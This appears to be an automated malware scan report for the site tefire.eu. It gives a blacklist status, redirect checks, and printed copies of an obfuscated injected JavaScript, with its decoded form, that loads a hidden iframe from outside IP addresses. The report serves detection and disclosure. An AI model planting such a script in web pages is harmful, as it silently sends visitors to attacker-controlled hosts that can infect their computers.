Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tefire.eu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tefire.eu/ | 200 OK Content-Length: 10253 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/'; var group = '?' + 'i' + 'd' + '=' + '1'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>'); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
| ||
http://tefire.eu/test404page.js | 200 OK Content-Length: 10253 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var tds_url = 'ht' + 'tp:' + '//' + '91.' + '217.' + '91.' + '104' + '/'; var group = '?' + 'i' + 'd' + '=' + '1'; var charset = 'utf-8'; var referer = encodeURIComponent(document.referrer); var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>'); Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tefire.eu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 04:28:22 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 10253
Content-Type: text/html
Last-Modified: Wed, 22 Jan 2014 12:18:01 GMT
...10253 bytes of data.
GET / HTTP/1.1
Host: tefire.eu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 04:28:22 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 10253
Content-Type: text/html
Last-Modified: Wed, 22 Jan 2014 12:18:01 GMT
...10253 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tefire.eu
Referer: http://www.google.com/search?q=tefire.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tefire.eu
Referer: http://www.google.com/search?q=tefire.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.